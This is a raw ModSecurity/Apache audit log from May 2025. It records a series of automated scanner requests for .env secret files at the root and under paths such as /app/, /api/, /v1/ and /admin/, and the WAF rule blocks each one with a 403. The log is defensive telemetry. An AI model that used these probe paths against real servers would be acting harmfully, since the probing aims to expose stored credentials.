[01/May/2025:07:50:07 +0700] aBLFP4144kZ4LAGlEgyk4AAAANg 103.236.140.4 38896 103.236.140.4 8181
--1af51f16-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Charset: utf-8
--1af51f16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1af51f16-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746060607483660 813 (- - -)
Stopwatch2: 1746060607483660 813; combined=331, p1=294, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1af51f16-Z--
--678e803d-A--
[01/May/2025:07:51:01 +0700] aBLFdcVMAgMJpNzaVtJlOAAAAEU 103.236.140.4 39110 103.236.140.4 8181
--678e803d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept-Charset: utf-8
--678e803d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--678e803d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746060661221255 748 (- - -)
Stopwatch2: 1746060661221255 748; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--678e803d-Z--
--c8bad145-A--
[01/May/2025:08:02:19 +0700] aBLIG8VMAgMJpNzaVtJmrwAAAEA 103.236.140.4 41730 103.236.140.4 8181
--c8bad145-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)
Accept-Charset: utf-8
--c8bad145-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c8bad145-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746061339469668 930 (- - -)
Stopwatch2: 1746061339469668 930; combined=342, p1=288, p2=0, p3=0, p4=0, p5=54, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c8bad145-Z--
--62dbfe7e-A--
[01/May/2025:08:06:16 +0700] aBLJCOVeTgVPHjrSAYC_bAAAAAc 103.236.140.4 42640 103.236.140.4 8181
--62dbfe7e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept-Charset: utf-8
--62dbfe7e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--62dbfe7e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746061576977067 842 (- - -)
Stopwatch2: 1746061576977067 842; combined=392, p1=352, p2=0, p3=0, p4=0, p5=40, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--62dbfe7e-Z--
--92734324-A--
[01/May/2025:10:01:43 +0700] aBLkF-VeTgVPHjrSAYD7egAAAAs 103.236.140.4 42100 103.236.140.4 8181
--92734324-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.71.77.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.71.77.17
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--92734324-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--92734324-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746068503143052 690 (- - -)
Stopwatch2: 1746068503143052 690; combined=263, p1=225, p2=0, p3=0, p4=0, p5=38, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--92734324-Z--
--4c4ef271-A--
[01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUQAAAI0 103.236.140.4 49068 103.236.140.4 8181
--4c4ef271-B--
GET /app/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4c4ef271-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c4ef271-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069930537907 839 (- - -)
Stopwatch2: 1746069930537907 839; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c4ef271-Z--
--2a0a3802-A--
[01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUwAAAIE 103.236.140.4 49086 103.236.140.4 8181
--2a0a3802-B--
GET /backend/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--2a0a3802-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a0a3802-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069930737608 563 (- - -)
Stopwatch2: 1746069930737608 563; combined=196, p1=174, p2=0, p3=0, p4=0, p5=22, sr=48, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a0a3802-Z--
--ad074920-A--
[01/May/2025:10:25:30 +0700] aBLpqsVMAgMJpNzaVtKqZAAAAEc 103.236.140.4 49096 103.236.140.4 8181
--ad074920-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--ad074920-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad074920-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069930937310 772 (- - -)
Stopwatch2: 1746069930937310 772; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad074920-Z--
--f607fa5c-A--
[01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZQAAAEk 103.236.140.4 49106 103.236.140.4 8181
--f607fa5c-B--
GET /code/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--f607fa5c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f607fa5c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069931136965 821 (- - -)
Stopwatch2: 1746069931136965 821; combined=343, p1=309, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f607fa5c-Z--
--5ba65174-A--
[01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZgAAAEI 103.236.140.4 49116 103.236.140.4 8181
--5ba65174-B--
GET /db/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--5ba65174-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5ba65174-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069931337490 774 (- - -)
Stopwatch2: 1746069931337490 774; combined=280, p1=242, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5ba65174-Z--
--469b3c5e-A--
[01/May/2025:10:25:31 +0700] aBLpqygtr0Qsi1mFAsMIVAAAAI8 103.236.140.4 49126 103.236.140.4 8181
--469b3c5e-B--
GET /login/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--469b3c5e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--469b3c5e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069931536927 865 (- - -)
Stopwatch2: 1746069931536927 865; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--469b3c5e-Z--
--d363ff10-A--
[01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfAAAANM 103.236.140.4 49140 103.236.140.4 8181
--d363ff10-B--
GET /api_v1/go/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--d363ff10-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d363ff10-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069931739050 861 (- - -)
Stopwatch2: 1746069931739050 861; combined=353, p1=309, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d363ff10-Z--
--98a93b64-A--
[01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfwAAAMU 103.236.140.4 49150 103.236.140.4 8181
--98a93b64-B--
GET /api_v1/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--98a93b64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--98a93b64-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069931939554 799 (- - -)
Stopwatch2: 1746069931939554 799; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--98a93b64-Z--
--255d3573-A--
[01/May/2025:10:25:32 +0700] aBLprI144kZ4LAGlEgzxgQAAANE 103.236.140.4 49160 103.236.140.4 8181
--255d3573-B--
GET /api_v2/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--255d3573-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--255d3573-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069932139893 828 (- - -)
Stopwatch2: 1746069932139893 828; combined=276, p1=242, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--255d3573-Z--
--8874fe7f-A--
[01/May/2025:10:25:32 +0700] aBLprMVMAgMJpNzaVtKqawAAAE0 103.236.140.4 49170 103.236.140.4 8181
--8874fe7f-B--
GET /api_v2/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--8874fe7f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8874fe7f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069932340054 671 (- - -)
Stopwatch2: 1746069932340054 671; combined=263, p1=238, p2=0, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8874fe7f-Z--
--a51c691b-A--
[01/May/2025:10:25:33 +0700] aBLprSgtr0Qsi1mFAsMIVgAAAIY 103.236.140.4 49214 103.236.140.4 8181
--a51c691b-B--
GET /v2/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--a51c691b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a51c691b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069933255655 869 (- - -)
Stopwatch2: 1746069933255655 869; combined=362, p1=316, p2=0, p3=0, p4=0, p5=46, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a51c691b-Z--
--af574005-A--
[01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqdwAAAEE 103.236.140.4 49262 103.236.140.4 8181
--af574005-B--
GET /v1/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--af574005-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af574005-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069934171514 653 (- - -)
Stopwatch2: 1746069934171514 653; combined=239, p1=209, p2=0, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af574005-Z--
--4d842e29-A--
[01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqegAAAFI 103.236.140.4 49272 103.236.140.4 8181
--4d842e29-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4d842e29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4d842e29-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069934373450 736 (- - -)
Stopwatch2: 1746069934373450 736; combined=288, p1=253, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
